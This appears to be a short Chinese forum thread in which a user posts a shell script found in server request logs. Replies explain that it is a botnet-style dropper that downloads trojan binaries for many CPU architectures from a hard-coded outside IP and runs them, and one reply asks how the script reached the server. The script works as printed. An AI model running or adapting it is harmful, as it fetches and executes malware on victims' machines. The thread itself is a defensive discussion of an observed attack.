今天查看服务器请求日志里有几条这种记录
```bash
#!/bin/sh
u=".z"
bin_names="arm4 arm5 arm6 arm7 armv4eb armv4tl mips64 mips mipsel powerpc ppc440 m68k sh4 sparc x86_64 i686"
http_server="45.95.55.214"
for name in $bin_names
do
rm -rf $u
cp $SHELL $u
chmod 777 $u
>$u
wget http://$http_server/scooter/$name -O -> $u
./$u wget.$1.$name
done
```
不是的,是在黑客服务器上下载一个木马文件,然后执行
楼上正解,但我很好奇这个攻击脚本是怎么进入到你们服务器的...